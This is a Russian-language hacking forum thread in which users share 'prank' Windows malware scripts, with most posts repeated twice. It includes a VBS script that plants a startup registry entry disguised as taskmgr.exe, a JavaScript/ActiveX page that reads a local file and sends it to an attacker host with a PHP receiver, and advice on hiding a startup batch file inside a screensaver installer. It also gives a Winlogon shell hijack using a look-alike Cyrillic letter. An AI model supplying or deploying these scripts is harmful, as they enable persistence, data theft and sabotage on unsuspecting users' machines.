( Вход | Регистрация | Поиск )
Прикольный скрипт, Накатал на досуге...
Стандартный · [ Линейный ]
Дата обновления: 03.12.2007 - 05:20, перейти к новому сообщению
Вот решил побаловаться =)
Вирь можно сказать простенький, Достал!.vbs
Тестим:
Ну естесно всё что после "'" не учитывается.
Потом скрипт создаёт запись в реестре, в разделе run, которая
запускает System.bat на диске Ц.
Далее создаётся сам System.bat на диске Ц с произвольным
содерданием "notepad.exe c:\1.txt". Дальше больше моей фантазии... =)))
На диске Ц создаётся документ 1.txt =)))))))) с содержанием
"Долбанный хеллоу ворлд!" или по вашему желанию.
На этом, моя извращённая фантазия исчерпывается пока =))
В итоги, мы имеем после запуска скриптика
постоянный запуск блокнота при старте винды с надписью "
Долбанный хеллоу ворлд!" ухишьрения, циклы, прятанья и остальное
оставляю вам. Поиздевайтесь над не опытными сокалегами.
Например можно приписать скрипт autorun-на компакт диска,
запускающего данный скрипт vbs.
Писал, специально для новечков. Думаю всё понятно и максимально
просто, что даёт вводные знания о системе скриптов винды. Юзаем =)
Вирь можно сказать простенький, Достал!.vbs
Тестим:
QUOTE
'Ваня представляет супер нарулный вирус.!!
Set WSHShell=WScript.CreateObject("WScript.Shell")
WSHShell.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\taskmgr.exe", "c:\System.bat"
Set xep =CreateObject("Scripting.FilesystemObject")
set xep =xep.CreateTextFile("c:\System.bat")
xep.WriteLine "notepad.exe c:\1.txt"
xep.close
Set xep =CreateObject("Scripting.FilesystemObject")
set xep =xep.CreateTextFile("c:\1.txt")
xep.WriteLine "Долбанный хеллоу ворлд!"
xep.close
Set WSHShell=WScript.CreateObject("WScript.Shell")
WSHShell.RegWrite"HKLM\Software\Microsoft\Windows\CurrentVersion\Run\taskmgr.exe", "c:\System.bat"
Set xep =CreateObject("Scripting.FilesystemObject")
set xep =xep.CreateTextFile("c:\System.bat")
xep.WriteLine "notepad.exe c:\1.txt"
xep.close
Set xep =CreateObject("Scripting.FilesystemObject")
set xep =xep.CreateTextFile("c:\1.txt")
xep.WriteLine "Долбанный хеллоу ворлд!"
xep.close
Ну естесно всё что после "'" не учитывается.
Потом скрипт создаёт запись в реестре, в разделе run, которая
запускает System.bat на диске Ц.
Далее создаётся сам System.bat на диске Ц с произвольным
содерданием "notepad.exe c:\1.txt". Дальше больше моей фантазии... =)))
На диске Ц создаётся документ 1.txt =)))))))) с содержанием
"Долбанный хеллоу ворлд!" или по вашему желанию.
На этом, моя извращённая фантазия исчерпывается пока =))
В итоги, мы имеем после запуска скриптика
постоянный запуск блокнота при старте винды с надписью "
Долбанный хеллоу ворлд!" ухишьрения, циклы, прятанья и остальное
оставляю вам. Поиздевайтесь над не опытными сокалегами.
Например можно приписать скрипт autorun-на компакт диска,
запускающего данный скрипт vbs.
Писал, специально для новечков. Думаю всё понятно и максимально
просто, что даёт вводные знания о системе скриптов винды. Юзаем =)
Ответов(10 - 17)
Не знаю как в VBS'е, но в вэб-программировании при создании объекта файловой системы
браузер сразу выдает предупреждение, что страница содержит небезопасный код
.
И вообще Касперский определяет подобные штуки как червя и блокирует к ним доступ.
А так вот я тоже тут вечерком скриптец накатал для кражи данных с пользовательских компьютеров
<script>
var hackerHOST = 'http://some-hackers.host/exploit.php';
function deface()
{
var fso = new ActiveXObject("Scripting.FileSystemObject");
var file = fso.openTextFile("c:\\privateInfo.txt", 1 ,true);
var fContent = '';
while (!file.AtEndOfStream)
fContent += file.ReadLine() + '<BR>';
file.Close();
var hackerURL = hackerHOST + '?fContent=' + fContent;
var xmlRequest = new ActiveXObject("Microsoft.XMLHTTP");
if (xmlRequest)
{
xmlRequest.onreadystatechange = processChange;
xmlRequest.open("GET", hackerURL, true);
xmlRequest.send();
}
}
function processChange()
{
if (xmlRequest.readyState == 4)
{
if (xmlRequest.status == 200)
{
myResponse = xmlRequest.responseXML.documentElement;
parseOutput(myResponse);
}
}
}
</SCRIPT>
<A href="javascript:void(0);" ONCLICK="javascript:deface();">ЖЫМИТЕ, ПАЖАЛУСТА, СЮДА</A>
И соответственно back-end всего этого
<?PHP
$fp = fopen('C:\stolenInformation.txt','w');
fputs($fp,$_GET["fContent"]);
fclose();
?>
Р.S. Для увода большого количества информации можно использовать POST метод при отправке данных
CODE
CreateObject("Scripting.FilesystemObject")
браузер сразу выдает предупреждение, что страница содержит небезопасный код
.И вообще Касперский определяет подобные штуки как червя и блокирует к ним доступ
.А так вот я тоже тут вечерком скриптец накатал для кражи данных с пользовательских компьютеров
CODE
<script>
var hackerHOST = 'http://some-hackers.host/exploit.php';
function deface()
{
var fso = new ActiveXObject("Scripting.FileSystemObject");
var file = fso.openTextFile("c:\\privateInfo.txt", 1 ,true);
var fContent = '';
while (!file.AtEndOfStream)
fContent += file.ReadLine() + '<BR>';
file.Close();
var hackerURL = hackerHOST + '?fContent=' + fContent;
var xmlRequest = new ActiveXObject("Microsoft.XMLHTTP");
if (xmlRequest)
{
xmlRequest.onreadystatechange = processChange;
xmlRequest.open("GET", hackerURL, true);
xmlRequest.send();
}
}
function processChange()
{
if (xmlRequest.readyState == 4)
{
if (xmlRequest.status == 200)
{
myResponse = xmlRequest.responseXML.documentElement;
parseOutput(myResponse);
}
}
}
</SCRIPT>
<A href="javascript:void(0);" ONCLICK="javascript:deface();">ЖЫМИТЕ, ПАЖАЛУСТА, СЮДА</A>
И соответственно back-end всего этого
CODE
<?PHP
$fp = fopen('C:\stolenInformation.txt','w');
fputs($fp,$_GET["fContent"]);
fclose();
?>
Р.S. Для увода большого количества информации можно использовать POST метод при отправке данных
неплохая тема у Гражданин'а, но я делал это проще:
1. создаем нужный бат(к примеру:
echo off
start explorer
start c:\explorer.bat)
2. создаём ключик реестра, дав дд имя explorer.exe
3. прикрепляем это в инсталляшку - в моём случае это была заставка мисс плэйбой.
преемущества:
1. антивирь скажет о попытке проникновения в реестр, но это обычное дело при инсталле. ваш ответ - разрешить.
2. через мсконфиг видно explorer.exe
3. скан бесполезен!
1. создаем нужный бат(к примеру:
echo off
start explorer
start c:\explorer.bat)
2. создаём ключик реестра, дав дд имя explorer.exe
3. прикрепляем это в инсталляшку - в моём случае это была заставка мисс плэйбой.
преемущества:
1. антивирь скажет о попытке проникновения в реестр, но это обычное дело при инсталле. ваш ответ - разрешить.
2. через мсконфиг видно explorer.exe
3. скан бесполезен!
Можно ещё как dll`ку подгружать при старте системы. 
Можно, вот например, как сервис запускать... Варианты есть.
Можно, вот например, как сервис запускать... Варианты есть.
Жень, давай не будем забывать, что этот прикол расчитан на ламеров, а если кто-то и додумается залезть в мсконфиг, то отключить explorer.exe не у каждого рука поднимиться, а адрес мона сменить, кинув bat в WINDOWS\System32
и соответственно адресок в самом бате и реестре подправив...
так лучше?
зы: в завершение - прокатывало))
и соответственно адресок в самом бате и реестре подправив...
так лучше?
зы: в завершение - прокатывало))
Нечто подобное несколько лет назад видел на каком то сайте.
var wsh=WScript.CreateObject("WScript.Shell");
WScript.Sleep("3000");
wsh.Run("notepad");
str = "вот здесь будет текст";
while(1==1)
{
WScript.Sleep("300");
for(i=0; i<str.length; i++)
{
wsh.AppActivate("Безымянный - Блокнот");
wsh.SendKeys(str.charAt(i));
WScript.Sleep("300");
}
WScript.Sleep("120000");
}
Данный скрипт как бы запускает блокнот и вбивает побуквенно строку которую вы ему зададите довольно интересный прикол.
Code
var wsh=WScript.CreateObject("WScript.Shell");
WScript.Sleep("3000");
wsh.Run("notepad");
str = "вот здесь будет текст";
while(1==1)
{
WScript.Sleep("300");
for(i=0; i<str.length; i++)
{
wsh.AppActivate("Безымянный - Блокнот");
wsh.SendKeys(str.charAt(i));
WScript.Sleep("300");
}
WScript.Sleep("120000");
}
Данный скрипт как бы запускает блокнот и вбивает побуквенно строку которую вы ему зададите довольно интересный прикол.
delay(0), вариант #2:
пишем батник:
(!)выделенная 'е' - кириллица
Там придумываем как бы ентот батник запустить и получаем невключение Explorer'a на компе, а через диспетчер задач открывается тока проводник.
Можно конечно ещё и доступ к диспетчеру задач закрыть, чтоб в реестр не лазили, но это слишком жёстко и не только для новичков.
пишем батник:
Цитата | Quote
reg add "hklm\software\microsoft\windows nt\currentversion\winlogon" /v Shell /t REG_SZ /d Explorer.exе /f
(!)выделенная 'е' - кириллица
Там придумываем как бы ентот батник запустить и получаем невключение Explorer'a на компе, а через диспетчер задач открывается тока проводник.
Можно конечно ещё и доступ к диспетчеру задач закрыть, чтоб в реестр не лазили, но это слишком жёстко и не только для новичков.
SoftoRooM © 2004-2024